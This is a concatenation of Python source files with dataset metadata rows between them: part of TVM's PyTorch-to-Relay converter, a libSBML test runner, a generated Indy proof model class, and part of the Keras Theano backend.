elif kind == "ListType":
return "ListType"
elif kind in ["IntType", "FloatType", "BoolType", "StringType", "OptionalType"]:
pt_dtype = str(typ).lower()
dtype = pt_dtype if pt_dtype == "OptionalType" else _convert_data_type(pt_dtype)
return dtype
else:
return "UnsupportedType"
def _get_input_types(op_node, outputs, default_dtype="float32"):
"""Returns a TVM dtype for each input nodes derived from the torch type"""
in_types = []
for inp in op_node.inputs():
if inp.node().kind() == "prim::GetAttr":
# GetAttr nodes always return None when we call scalarType() on it
name = inp.debugName()
assert name in outputs
if isinstance(outputs[name], _expr.Var):
in_types.append(outputs[name].type_annotation.dtype)
else:
# For quantized modules with parameters, here we would get
# "prim::GetAttr[name="_packed_params"]". Since the dtype corresponding to
# _packed_params is not needed by quantized ops, we return an arbitrary type.
in_types.append(default_dtype)
else:
in_types.append(_get_pytorch_value_type(inp.type(), default_dtype=default_dtype))
return in_types
def _get_constant(node):
"""Retrieve a constant associated with this prim::Constant node"""
attribute_names = node.attributeNames()
num_attributes = len(attribute_names)
if num_attributes == 1:
attr_name = attribute_names[0]
ty = node.output().type().kind()
if ty == "IntType":
return node.i(attr_name)
elif ty == "BoolType":
return bool(node.i(attr_name))
elif ty in ["FloatType", "LongType"]:
return node.f(attr_name)
elif ty in ["TensorType", "CompleteTensorType"]:
tensor = node.t(attr_name)
if tensor.is_cuda:
tensor = tensor.cpu()
if len(tensor.shape) == 0: # tensor(0.1)
# TODO(t-vi): When is this needed?
return tensor.item()
return _wrap_const(tensor.numpy())
elif ty in ["DeviceObjType", "StringType"]:
return node.s(attr_name)
elif ty == "FunctionType":
return None
else:
raise NotImplementedError("Unsupported type: %s" % ty)
else:
assert num_attributes == 0
return None
def _get_operator_nodes(nodes):
"""Returns torch IR nodes that need conversion to Relay"""
ops = []
# Traverse nodes and add to graph
for node in nodes:
if node.outputsSize() == 0:
continue
if node.outputsSize() > 1:
node_name = "_".join(_get_output_names(node))
else:
node_name = _get_output_name(node)
if node.kind() != "prim::GetAttr":
ops.append((node_name, node))
return ops
def _get_relay_input_vars(graph, input_infos, prelude, is_module=True, default_dtype="float32"):
"""
Return Relay vars from input shapes and create entries based on
expected graph inputs - to allow translation
"""
graph_inputs = list(graph.inputs())
if is_module:
# a module has "self" as first input, which we do not need/want
graph_inputs = graph_inputs[1:]
if not isinstance(input_infos, list):
msg = "Graph inputs input_infos should be a list"
raise RuntimeError(msg)
if len(graph_inputs) != len(input_infos):
msg = "PyTorch has {} inputs and input_infos lists {}.".format(
len(graph_inputs), len(input_infos)
)
raise RuntimeError(msg)
def get_relay_ty(ishape, itype, pt_type):
if pt_type.kind() == "TensorType":
if not (_is_int_seq(ishape) or len(ishape) == 0):
msg = "Shape for Tensors must be lists of ints"
raise RuntimeError(msg)
if (pt_type.dim() is not None and pt_type.dim() != len(ishape)) or (
pt_type.sizes() is not None
and any([s1 != s2 for s1, s2 in zip(pt_type.sizes(), ishape)])
):
msg = "Shapes of input list and information in the graph do not match"
raise RuntimeError(msg)
pt_dtype = pt_type.scalarType()
if not pt_dtype and itype:
pt_dtype = itype
dtype = _convert_data_type(pt_dtype, default_dtype=default_dtype)
return TensorType(ishape, dtype)
elif pt_type.kind() == "TupleType":
if not isinstance(ishape, tuple):
msg = "Shapes for tuples must be tuples"
raise RuntimeError(msg)
return TupleType(
[get_relay_ty(elem, itype, pt_t) for elem, pt_t in zip(ishape, pt_type.elements())]
)
elif pt_type.kind() == "ListType":
if not isinstance(ishape, list):
msg = "Shapes for lists must be lists"
raise RuntimeError(msg)
pt_elemtype = pt_type.getElementType()
elem_tys = [get_relay_ty(s, itype, pt_elemtype) for s in ishape]
if len(elem_tys) > 0 and not all(map(lambda ty: ty == elem_tys[0], elem_tys)):
msg = "List elements need have identical types"
raise RuntimeError(msg)
rlist, _, _ = prelude.mod.get_type("List")
return rlist(elem_tys[0])
elif pt_type.kind() == "OptionalType":
# we do not support None yet, so we fill in the type
return get_relay_ty(ishape, itype, pt_type.getElementType())
# TODO: scalar inputs
raise NotImplementedError("unsupported input type")
input_vars = {}
new_input_infos = []
for num, inp in enumerate(input_infos):
if not isinstance(inp, tuple):
msg = "Graph input {} is not a tuple".format(num)
raise RuntimeError(msg)
if len(inp) != 2 or not isinstance(inp[0], str):
msg = (
"Graph input {} is not valid,"
" expected ('name', shape) or ('name', (shape, dtype))".format(inp)
)
raise RuntimeError(msg)
if not isinstance(inp[1], tuple) or len(inp[1]) == 0 or not isinstance(inp[1][-1], str):
new_input_infos.append((inp[0], (inp[1], default_dtype)))
else:
new_input_infos.append(inp)
input_types = [
(name, get_relay_ty(info[0], info[1], gi.type()))
for (name, info), gi in zip(new_input_infos, graph_inputs)
]
ir_inputs = [i.debugName() for i in graph_inputs]
for ir_input, (name, itype) in zip(ir_inputs, input_types):
inp = _expr.var(name, type_annotation=itype)
# Translate from graph input to user input name
input_vars[ir_input] = inp
return input_vars
def _unpack_tuple(tup):
def unpack(tup, num_fields):
return [_expr.TupleGetItem(tup, i) for i in range(num_fields)]
if isinstance(tup, _expr.Tuple):
return unpack(tup, len(tup.fields))
elif isinstance(tup.type_annotation, TupleType):
return unpack(tup, len(tup.type_annotation.fields))
# shouldn't happen
assert False
def _get_free_vars_from_block(block):
block_inp_names = _get_input_names(block)
bound_names = block_inp_names
free_vars = set()
for node in block.nodes():
inp_names = _get_input_names(node)
list_diff = [name for name in inp_names if name not in bound_names]
free_vars.update(list_diff)
bound_names += _get_output_names(node)
return free_vars
def get_use_chains(root_node, terminate=lambda _: False):
"""
Track a chain of users of this node forward, returning a list of chains
See get_attr_chains below for its usage
"""
def concat_lists(lists):
return itertools.chain.from_iterable(lists)
def inner(current, accum):
users = _get_users(current)
if not users or terminate(users):
return [accum]
return concat_lists([inner(nxt, accum + [nxt]) for nxt in users])
return inner(root_node, [root_node])
def get_attr_chains(root_getattr_node):
"""Returns chains of attribute access starting from root_getattr_node
For example, given attribute "block", as in "self.block" when "self" points
to the top level torch.nn.Module, it returns lists of attribute "chains",
e.g. ['block', '2'], ['block', '1'], ['block', '0', '_packed_params']
These sets of attributes form full attribute accessors. For example,
"self.block.1", "self.block.2" will return the second and third submodule,
and "self.block.0._packed_params" will return the parameters of the first
submodule.
"""
def terminate(users):
next_attrs = [user for user in users if user.kind() == "prim::GetAttr"]
return len(next_attrs) == 0
return get_use_chains(root_getattr_node, terminate)
def convert_params(graph, state_dict, use_parser_friendly_name=False):
"""
Return Relay vars and TVM NDArrays for input parameters
A chain of prim::GetAttr nodes is processed one at a time
"""
getattr_nodes = graph.findAllNodes("prim::GetAttr", recurse=True)
params = {}
param_tensors = {}
packed_param_map = {}
vars_by_name = {}
seen = set()
attr_name_sep = "_" if use_parser_friendly_name else "."
for node in getattr_nodes:
if _get_output_name(node) in seen:
continue
for getattrs in get_attr_chains(node):
seen.update(map(_get_output_name, getattrs))
full_attr = _getattr_full_name(getattrs, attr_name_sep)
full_attr_node_name = _get_output_name(getattrs[-1])
if full_attr.endswith("_packed_params"): # for quantized models
packed_param_map[full_attr_node_name] = full_attr
elif full_attr in state_dict:
if full_attr in vars_by_name:
var = vars_by_name[full_attr]
else:
torch_tensor = state_dict[full_attr]
tensor, var = _get_tensor_and_var(torch_tensor, full_attr)
param_tensors[full_attr] = tensor
vars_by_name[full_attr] = var
params[full_attr_node_name] = var
return params, param_tensors, packed_param_map
def get_all_op_names(graph):
"""Return all operator names in the input graph"""
nodes = list(graph.nodes())
prim_with_blocks = ["prim::If", "prim::Loop"]
for prim in prim_with_blocks:
prim_nodes = graph.findAllNodes(prim, recurse=True)
for prim_node in prim_nodes:
for block in prim_node.blocks():
nodes += block.nodes()
return set(node.kind() for node in nodes)
def from_pytorch(
script_module,
input_infos,
custom_convert_map=None,
default_dtype="float32",
use_parser_friendly_name=False,
keep_quantized_weight=False,
):
"""Load PyTorch model in the form of a scripted PyTorch model and convert into relay.
The companion parameters will be handled automatically.
Parameters
----------
script_module : TopLevelTracedModule object
TorchScripted PyTorch graph
Note: We currently only support traces (ie: torch.jit.trace(model, input))
input_infos : List of tuples
Can be (input name, input shape) or (input name, (input shape, input types))
Graph level input shape and type list
The same input names need to be used for deployment, so choose easy to
remember names (such as: input0, input1)
e.g.
[('input0', (1, 2)), ('input1', (3, 4))]
or
[('input0', ((1, 2), 'int')), ('input1', ((3, 4), 'float'))]
custom_convert_map : Dictionary of str to Relay op
A custom op conversion map in the same format as _convert_map above
default_type : str
The default dtype to use when type information is not provided by PyTorch.
use_parser_friendly_name : bool
When True, replace '.' with `_' in a original parameter name.
The Relay text parser treats a variable name followed by a period as a tuple element access,
so a variable name like "dense.weight" cannot be parsed correctly.
Use this option when you want to run the AnnotateSpans pass on the imported module.
keep_quantized_weight : bool
Return quantized weights and bias, rather than float ones. PyTorch stores quantized weights
in a custom format, so we cannot directly access 8 bit weights as Numpy arrays. We use
a PyTorch function to unpack quantized weights into float32 arrays and quantization
parameters. By default, we return float32 weights and rely on the QNN lowering and the
Relay constant folding pass to quantize weights at compile time. In BYOC use cases, however,
we cannot apply the constant folding pass on a QNN graph. If keep_quantized_weight is True,
we quantize weights in the frontend using a function that is equivalent to
qnn.op.quantize(...) operating on Numpy arrays.
Returns
-------
mod : tvm.IRModule
The module that optimizations will be performed on.
params : dict of str to tvm.runtime.NDArray
Dict of converted parameters stored in tvm.runtime.ndarray format
"""
import torch
mod = tvm.IRModule()
prelude = Prelude(mod)
converter = PyTorchOpConverter(prelude, default_dtype)
graph = script_module.graph.copy()
_run_jit_passes(graph)
if custom_convert_map:
converter.update_convert_map(custom_convert_map)
op_names = get_all_op_names(graph)
converter.report_missing_conversion(op_names)
is_module = isinstance(script_module, torch.jit.ScriptModule)
params = script_module.state_dict() if is_module else {}
outputs = _get_relay_input_vars(
graph, input_infos, prelude, default_dtype=default_dtype, is_module=is_module
)
if use_parser_friendly_name:
new_names = [key.replace(".", "_") for key in params.keys()]
params = dict(zip(new_names, params.values()))
param_vars, tensors, packed_param_map = convert_params(graph, params, use_parser_friendly_name)
tvm_params = {k: tvm.nd.array(v) for k, v in tensors.items()}
outputs.update(param_vars)
ret_name = _get_input_names(graph.return_node())
# For quantized models
quantized_ops = set(["aten::quantize_per_tensor", "quantized::linear_dynamic"])
if len(quantized_ops.intersection(set(op_names))) > 0:
weight_quant_params = qnn_torch.get_weight_quant_params(
script_module, packed_param_map.values()
)
input_scales_for_bias = qnn_torch.add_input_quant_params_to_op_inputs(graph)
qnn_torch.add_quant_params_to_outputs(
outputs,
packed_param_map,
weight_quant_params,
input_scales_for_bias,
keep_quantized_weight,
)
qnn_torch.add_quant_params(tvm_params, weight_quant_params)
converter.update_convert_map(qnn_torch.convert_map)
ret = converter.convert_operators(_get_operator_nodes(graph.nodes()), outputs, ret_name)[0]
if isinstance(ret, list):
# ListConstruct kept original python list. Convert to tuple.
ret = _expr.Tuple(ret)
# Separate data inputs and parameters to make sure data inputs come first.
func_args = []
data_inputs = []
for arg in _analysis.free_vars(ret):
if arg.name_hint not in tvm_params.keys():
data_inputs.append(arg)
else:
func_args.append(arg)
func_args = data_inputs + func_args
mod["main"] = tvm.relay.Function(func_args, ret)
return transform.RemoveUnusedFunctions()(mod), tvm_params
| 37.566667
| 120
| 0.579753
|
4a07ade329559516e35a4362e760d0684458baef
| 1,977
|
py
|
Python
|
bindings/python/doc-converter/test/run.py
|
sys-bio/sbml2matlab
|
3e957c3508f85e55cfd4564230240467a55d9c27
|
[
"BSD-3-Clause"
] | 1
|
2021-03-25T23:13:45.000Z
|
2021-03-25T23:13:45.000Z
|
bindings/python/doc-converter/test/run.py
|
luciansmith/sbml2matlab
|
bcc2ec734caacb3b30556d527f2bf8a6f9f57950
|
[
"BSD-3-Clause"
] | 2
|
2016-01-19T18:02:13.000Z
|
2016-02-13T23:07:45.000Z
|
bindings/python/doc-converter/test/run.py
|
sys-bio/sbml2matlab
|
3e957c3508f85e55cfd4564230240467a55d9c27
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
##
## @file run.py
## @brief Unit test runner for libSBML Python doc converter
## @author Mike Hucka
##
## <!--------------------------------------------------------------------------
## This file is part of libSBML. Please visit http://sbml.org for more
## information about SBML, and the latest version of libSBML.
##
## Copyright (C) 2009-2013 jointly by the following organizations:
## 1. California Institute of Technology, Pasadena, CA, USA
## 2. EMBL European Bioinformatics Institute (EBML-EBI), Hinxton, UK
##
## Copyright (C) 2006-2008 by the California Institute of Technology,
## Pasadena, CA, USA
##
## Copyright (C) 2002-2005 jointly by the following organizations:
## 1. California Institute of Technology, Pasadena, CA, USA
## 2. Japan Science and Technology Agency, Japan
##
## This library is free software; you can redistribute it and/or modify it
## under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation. A copy of the license agreement is provided
## in the file named "LICENSE.txt" included with this software distribution
## and also available online as http://sbml.org/software/libsbml/license.html
## ------------------------------------------------------------------------ -->
import argparse
import os
import sys
import unittest
# Configure command line arguments and process them.
# If -h is provided, argparse will print the help and automatically exit.
help_prolog = "Run tests for libSBML's Python document string converter."
help_epilog = '''If give no arguments, this will run all the unit tests in
the "cases" subdirectory..'''
parser = argparse.ArgumentParser(description=help_prolog, epilog=help_epilog)
parser.parse_args()
# Run the tests.
ourdir = os.path.dirname(os.path.abspath(__file__))
tests = unittest.TestLoader().discover(start_dir=(ourdir + '/cases'))
runner = unittest.runner.TextTestRunner()
runner.run(tests)
| 39.54
| 79
| 0.682347
|
4a07ae326e068ff0b206e445bee89e06a314dacb
| 3,619
|
py
|
Python
|
acapy_client/models/indy_ge_proof.py
|
dbluhm/acapy-client
|
d92ef607ba2ff1152ec15429f2edb20976991424
|
[
"Apache-2.0"
] | 4
|
2021-08-05T09:20:34.000Z
|
2021-08-08T19:37:29.000Z
|
acapy_client/models/indy_ge_proof.py
|
dbluhm/acapy-client
|
d92ef607ba2ff1152ec15429f2edb20976991424
|
[
"Apache-2.0"
] | null | null | null |
acapy_client/models/indy_ge_proof.py
|
dbluhm/acapy-client
|
d92ef607ba2ff1152ec15429f2edb20976991424
|
[
"Apache-2.0"
] | 2
|
2021-08-12T18:18:45.000Z
|
2021-08-14T13:22:28.000Z
|
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.indy_ge_proof_pred import IndyGEProofPred
from ..models.indy_ge_proof_r import IndyGEProofR
from ..models.indy_ge_proof_t import IndyGEProofT
from ..models.indy_ge_proof_u import IndyGEProofU
from ..types import UNSET, Unset
T = TypeVar("T", bound="IndyGEProof")
@attr.s(auto_attribs=True)
class IndyGEProof:
""" """
alpha: Union[Unset, str] = UNSET
mj: Union[Unset, str] = UNSET
predicate: Union[Unset, IndyGEProofPred] = UNSET
r: Union[Unset, IndyGEProofR] = UNSET
t: Union[Unset, IndyGEProofT] = UNSET
u: Union[Unset, IndyGEProofU] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
alpha = self.alpha
mj = self.mj
predicate: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.predicate, Unset):
predicate = self.predicate.to_dict()
r: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.r, Unset):
r = self.r.to_dict()
t: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.t, Unset):
t = self.t.to_dict()
u: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.u, Unset):
u = self.u.to_dict()
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
if alpha is not UNSET:
field_dict["alpha"] = alpha
if mj is not UNSET:
field_dict["mj"] = mj
if predicate is not UNSET:
field_dict["predicate"] = predicate
if r is not UNSET:
field_dict["r"] = r
if t is not UNSET:
field_dict["t"] = t
if u is not UNSET:
field_dict["u"] = u
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
alpha = d.pop("alpha", UNSET)
mj = d.pop("mj", UNSET)
_predicate = d.pop("predicate", UNSET)
predicate: Union[Unset, IndyGEProofPred]
if isinstance(_predicate, Unset):
predicate = UNSET
else:
predicate = IndyGEProofPred.from_dict(_predicate)
_r = d.pop("r", UNSET)
r: Union[Unset, IndyGEProofR]
if isinstance(_r, Unset):
r = UNSET
else:
r = IndyGEProofR.from_dict(_r)
_t = d.pop("t", UNSET)
t: Union[Unset, IndyGEProofT]
if isinstance(_t, Unset):
t = UNSET
else:
t = IndyGEProofT.from_dict(_t)
_u = d.pop("u", UNSET)
u: Union[Unset, IndyGEProofU]
if isinstance(_u, Unset):
u = UNSET
else:
u = IndyGEProofU.from_dict(_u)
indy_ge_proof = cls(
alpha=alpha,
mj=mj,
predicate=predicate,
r=r,
t=t,
u=u,
)
indy_ge_proof.additional_properties = d
return indy_ge_proof
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| 28.952
| 77
| 0.581376
|
4a07af55d008c61f7b313b89f3c6b29773d9f8c9
| 70,615
|
py
|
Python
|
keras/backend/theano_backend.py
|
bjerva/keras
|
8d34e8a362f516b09a6e9f52f07264c9f1e088a9
|
[
"MIT"
] | null | null | null |
keras/backend/theano_backend.py
|
bjerva/keras
|
8d34e8a362f516b09a6e9f52f07264c9f1e088a9
|
[
"MIT"
] | null | null | null |
keras/backend/theano_backend.py
|
bjerva/keras
|
8d34e8a362f516b09a6e9f52f07264c9f1e088a9
|
[
"MIT"
] | 1
|
2020-06-11T02:11:58.000Z
|
2020-06-11T02:11:58.000Z
|
import theano
from theano import tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from theano.tensor.signal import pool
from theano.tensor.nnet import conv3d2d
from theano.printing import Print
try:
import theano.sparse as th_sparse_module
except ImportError:
th_sparse_module = None
try:
from theano.tensor.nnet.nnet import softsign as T_softsign
except ImportError:
from theano.sandbox.softsign import softsign as T_softsign
import inspect
import numpy as np
from .common import _FLOATX, floatx, _EPSILON, image_dim_ordering
py_all = all
# INTERNAL UTILS
theano.config.floatX = _FLOATX
_LEARNING_PHASE = T.scalar(dtype='uint8', name='keras_learning_phase') # 0 = test, 1 = train
def learning_phase():
# False = test, True = train
return _LEARNING_PHASE
def set_learning_phase(value):
global _LEARNING_PHASE
if value not in {0, 1}:
raise ValueError('Expected learning phase to be '
'0 or 1.')
_LEARNING_PHASE = value
# VARIABLE MANIPULATION
def _assert_sparse_module():
if not th_sparse_module:
raise ImportError("Failed to import theano.sparse\n"
"You probably need to pip install nose-parameterized")
def is_sparse(tensor):
return th_sparse_module and isinstance(tensor.type, th_sparse_module.SparseType)
def to_dense(tensor):
if is_sparse(tensor):
return th_sparse_module.dense_from_sparse(tensor)
else:
return tensor
def is_explicit_shape(shape):
if hasattr(shape, '__iter__'):
for x in shape:
if x is not None:
if not isinstance(x, int):
return False
return True
return False
def variable(value, dtype=None, name=None):
"""Instantiates a variable and returns it.
# Arguments
value: Numpy array, initial value of the tensor.
dtype: Tensor type.
name: Optional name string for the tensor.
# Returns
A variable instance (with Keras metadata included).
"""
if dtype is None:
dtype = floatx()
if hasattr(value, 'tocoo'):
_assert_sparse_module()
variable = th_sparse_module.as_sparse_variable(value)
else:
value = np.asarray(value, dtype=dtype)
variable = theano.shared(value=value, name=name, strict=False)
variable._keras_shape = value.shape
variable._uses_learning_phase = False
return variable
def placeholder(shape=None, ndim=None, dtype=None, sparse=False, name=None):
"""Instantiate an input data placeholder variable.
"""
if dtype is None:
dtype = floatx()
if shape is None and ndim is None:
raise ValueError('Specify either a shape or ndim value.')
if shape is not None:
ndim = len(shape)
else:
shape = tuple([None for _ in range(ndim)])
broadcast = (False,) * ndim
if sparse:
_assert_sparse_module()
x = th_sparse_module.csr_matrix(name=name, dtype=dtype)
else:
x = T.TensorType(dtype, broadcast)(name)
x._keras_shape = shape
x._uses_learning_phase = False
return x
def shape(x):
"""Returns the shape of a tensor.
Warning: type returned will be different for
Theano backend (Theano tensor type) and TF backend (TF TensorShape).
"""
return x.shape
def int_shape(x):
"""Returns the shape of a Keras tensor or a Keras variable as a tuple of
integers or None entries.
# Arguments
x: Tensor or variable.
# Returns
A tuple of integers (or None entries).
"""
if hasattr(x, '_keras_shape'):
return x._keras_shape
else:
raise Exception('Not a Keras tensor:', x)
def ndim(x):
return x.ndim
def dtype(x):
return x.dtype
def eval(x):
"""Returns the value of a tensor.
"""
return to_dense(x).eval()
def zeros(shape, dtype=None, name=None):
"""Instantiates an all-zeros variable.
"""
if dtype is None:
dtype = floatx()
return variable(np.zeros(shape), dtype, name)
def ones(shape, dtype=None, name=None):
"""Instantiates an all-ones variable.
"""
if dtype is None:
dtype = floatx()
return variable(np.ones(shape), dtype, name)
def eye(size, dtype=None, name=None):
"""Instantiates an identity matrix.
"""
if dtype is None:
dtype = floatx()
return variable(np.eye(size), dtype, name)
def ones_like(x, name=None):
return T.ones_like(x)
def zeros_like(x, name=None):
return T.zeros_like(x)
def random_uniform_variable(shape, low, high, dtype=None, name=None):
return variable(np.random.uniform(low=low, high=high, size=shape),
dtype=dtype, name=name)
def random_normal_variable(shape, mean, scale, dtype=None, name=None):
return variable(np.random.normal(loc=0.0, scale=scale, size=shape),
dtype=dtype, name=name)
def count_params(x):
"""Returns the number of scalars in a tensor.
Return: numpy integer.
"""
return np.prod(x.shape.eval())
def cast(x, dtype):
return T.cast(x, dtype)
# UPDATES OPS
def update(x, new_x):
return (x, new_x)
def update_add(x, increment):
return (x, x + increment)
def update_sub(x, decrement):
return (x, x - decrement)
def moving_average_update(variable, value, momentum):
return (variable, variable * momentum + value * (1. - momentum))
# LINEAR ALGEBRA
"""
Assumed overridden:
+, -, /, *, +=, -=, *=, /=
"""
def dot(x, y):
# TODO: `keras_shape` inference.
if is_sparse(x):
return th_sparse_module.basic.structured_dot(x, y)
else:
return T.dot(x, y)
def batch_dot(x, y, axes=None):
"""Batchwise dot product.
batch_dot results in a tensor with less dimensions than the input.
If the number of dimensions is reduced to 1, we use `expand_dims` to
make sure that ndim is at least 2.
# Arguments
x, y: tensors with ndim >= 2
axes: list (or single) int with target dimensions
# Returns
A tensor with shape equal to the concatenation of x's shape
(less the dimension that was summed over) and y's shape
(less the batch dimension and the dimension that was summed over).
If the final rank is 1, we reshape it to (batch_size, 1).
# Examples
Assume x = [[1, 2], [3, 4]] and y = [[5, 6], [7, 8]]
batch_dot(x, y, axes=1) = [[17, 53]] which is the main diagonal
of x.dot(y.T), although we never have to calculate the off-diagonal
elements.
Shape inference:
Let x's shape be (100, 20) and y's shape be (100, 30, 20).
If dot_axes is (1, 2), to find the output shape of resultant tensor,
loop through each dimension in x's shape and y's shape:
x.shape[0] : 100 : append to output shape
x.shape[1] : 20 : do not append to output shape,
dimension 1 of x has been summed over. (dot_axes[0] = 1)
y.shape[0] : 100 : do not append to output shape,
always ignore first dimension of y
y.shape[1] : 30 : append to output shape
y.shape[2] : 20 : do not append to output shape,
dimension 2 of y has been summed over. (dot_axes[1] = 2)
output_shape = (100, 30)
"""
# TODO: `keras_shape` inference.
if isinstance(axes, int):
axes = (axes, axes)
if axes is None:
# behaves like tf.batch_matmul as default
axes = [x.ndim - 1, y.ndim - 2]
out = T.batched_tensordot(x, y, axes=axes)
if ndim(out) == 1:
out = expand_dims(out, 1)
return out
def transpose(x):
# TODO: `keras_shape` inference.
return T.transpose(x)
def gather(reference, indices):
"""reference: a tensor.
indices: an int tensor of indices.
Return: a tensor of same type as reference.
"""
# TODO: `keras_shape` inference.
return reference[indices]
# ELEMENT-WISE OPERATIONS
def max(x, axis=None, keepdims=False):
return T.max(x, axis=axis, keepdims=keepdims)
def min(x, axis=None, keepdims=False):
return T.min(x, axis=axis, keepdims=keepdims)
def sum(x, axis=None, keepdims=False):
"""Sum of the values in a tensor, alongside the specified axis.
"""
return T.sum(x, axis=axis, keepdims=keepdims)
def prod(x, axis=None, keepdims=False):
"""Multiply the values in a tensor, alongside the specified axis.
"""
return T.prod(x, axis=axis, keepdims=keepdims)
def mean(x, axis=None, keepdims=False):
"""Mean of a tensor, alongside the specified axis.
"""
dtype = None
# bool is available since theano v0.9dev
if 'int' in x.dtype or x.dtype == 'bool':
dtype = floatx()
return T.mean(x, axis=axis, keepdims=keepdims, dtype=dtype)
def std(x, axis=None, keepdims=False):
return T.std(x, axis=axis, keepdims=keepdims)
def var(x, axis=None, keepdims=False):
return T.var(x, axis=axis, keepdims=keepdims)
def any(x, axis=None, keepdims=False):
"""Bitwise reduction (logical OR).
"""
return T.any(x, axis=axis, keepdims=keepdims)
def all(x, axis=None, keepdims=False):
"""Bitwise reduction (logical AND).
"""
return T.all(x, axis=axis, keepdims=keepdims)
def argmax(x, axis=-1):
return T.argmax(x, axis=axis, keepdims=False)
def argmin(x, axis=-1):
return T.argmin(x, axis=axis, keepdims=False)
def square(x):
return T.sqr(x)
def abs(x):
return T.abs_(x)
def sqrt(x):
x = T.clip(x, 0., np.inf)
return T.sqrt(x)
def exp(x):
return T.exp(x)
def log(x):
return T.log(x)
def round(x):
return T.round(x)
def sign(x):
return T.sgn(x)
def pow(x, a):
return T.pow(x, a)
def clip(x, min_value, max_value):
if max_value < min_value:
max_value = min_value
return T.clip(x, min_value, max_value)
def equal(x, y):
return T.eq(x, y)
def not_equal(x, y):
return T.neq(x, y)
def greater(x, y):
return T.gt(x, y)
def greater_equal(x, y):
return T.ge(x, y)
def lesser(x, y):
return T.lt(x, y)
def lesser_equal(x, y):
return T.le(x, y)
def maximum(x, y):
return T.maximum(x, y)
def minimum(x, y):
return T.minimum(x, y)
def sin(x):
return T.sin(x)
def cos(x):
return T.cos(x)
def normalize_batch_in_training(x, gamma, beta,
reduction_axes, epsilon=1e-3):
"""Computes mean and std for batch then apply batch_normalization on batch.
"""
# TODO remove this if statement when Theano without
# T.nnet.bn.batch_normalization_train is deprecated
if not hasattr(T.nnet.bn, 'batch_normalization_train'):
return _old_normalize_batch_in_training(x, gamma, beta, reduction_axes, epsilon)
normed, mean, stdinv = T.nnet.bn.batch_normalization_train(
x, gamma, beta, reduction_axes, epsilon)
return normed, mean, T.inv(stdinv ** 2)
def batch_normalization(x, mean, var, beta, gamma, epsilon=1e-3):
"""Apply batch normalization on x given mean, var, beta and gamma.
"""
# TODO remove this if statement when Theano without
# T.nnet.bn.batch_normalization_test is deprecated
if not hasattr(T.nnet.bn, 'batch_normalization_test'):
return _old_batch_normalization(x, mean, var, beta, gamma, epsilon)
if mean.ndim == 1:
# based on TensorFlow's default: normalize along rightmost dimension
reduction_axes = range(x.ndim - 1)
else:
reduction_axes = [i for i in range(x.ndim) if mean.broadcastable[i]]
return T.nnet.bn.batch_normalization_test(
x, gamma, beta, mean, var, reduction_axes, epsilon)
# TODO remove this function when Theano without
# T.nnet.bn.batch_normalization_train is deprecated
def _old_normalize_batch_in_training(x, gamma, beta,
reduction_axes, epsilon=1e-3):
"""Computes mean and std for batch then apply batch_normalization on batch.
"""
dev = theano.config.device
use_cudnn = ndim(x) < 5 and reduction_axes == [0, 2, 3] and (dev.startswith('cuda') or dev.startswith('gpu'))
if use_cudnn:
broadcast_beta = beta.dimshuffle('x', 0, 'x', 'x')
broadcast_gamma = gamma.dimshuffle('x', 0, 'x', 'x')
try:
normed, mean, stdinv = theano.sandbox.cuda.dnn.dnn_batch_normalization_train(
x, broadcast_gamma, broadcast_beta, 'spatial', epsilon)
normed = theano.tensor.as_tensor_variable(normed)
mean = theano.tensor.as_tensor_variable(mean)
stdinv = theano.tensor.as_tensor_variable(stdinv)
var = T.inv(stdinv ** 2)
return normed, T.flatten(mean), T.flatten(var)
except AttributeError:
pass
var = x.var(reduction_axes)
mean = x.mean(reduction_axes)
target_shape = []
for axis in range(ndim(x)):
if axis in reduction_axes:
target_shape.append(1)
else:
target_shape.append(x.shape[axis])
target_shape = T.stack(*target_shape)
broadcast_mean = T.reshape(mean, target_shape)
broadcast_var = T.reshape(var, target_shape)
broadcast_beta = T.reshape(beta, target_shape)
broadcast_gamma = T.reshape(gamma, target_shape)
normed = batch_normalization(x, broadcast_mean, broadcast_var,
broadcast_beta, broadcast_gamma,
epsilon)
return normed, mean, var
# TODO remove this if statement when Theano without
# T.nnet.bn.batch_normalization_test is deprecated
def _old_batch_normalization(x, mean, var, beta, gamma, epsilon=1e-3):
"""Apply batch normalization on x given mean, var, beta and gamma.
"""
if mean.ndim == 1 and x.ndim > 1:
# in TensorFlow's batch_normalization, if the parameters are vectors
# the batch normalization should be applied along the rightmost axis.
# Theano expects the parameters to always have x.ndim dimensions.
shuffle_pattern = ['x'] * (x.ndim - 1) + [0]
mean = mean.dimshuffle(shuffle_pattern)
var = var.dimshuffle(shuffle_pattern)
beta = beta.dimshuffle(shuffle_pattern)
gamma = gamma.dimshuffle(shuffle_pattern)
ndim = x.ndim
dev = theano.config.device
use_cudnn = ndim < 5 and (dev.startswith('cuda') or dev.startswith('gpu'))
if use_cudnn:
try:
axis = mean.broadcastable.index(False)
if axis != 1:
shuffle_pattern = list(range(ndim))
shuffle_pattern[1] = shuffle_pattern[axis]
shuffle_pattern[axis] = 1
result = theano.sandbox.cuda.dnn.dnn_batch_normalization_test(
x.dimshuffle(shuffle_pattern),
gamma.dimshuffle(shuffle_pattern),
beta.dimshuffle(shuffle_pattern),
mean.dimshuffle(shuffle_pattern),
var.dimshuffle(shuffle_pattern),
'spatial', epsilon).dimshuffle(shuffle_pattern)
else:
result = theano.sandbox.cuda.dnn.dnn_batch_normalization_test(
x, gamma, beta, mean, var, 'spatial', epsilon)
return theano.tensor.as_tensor_variable(result)
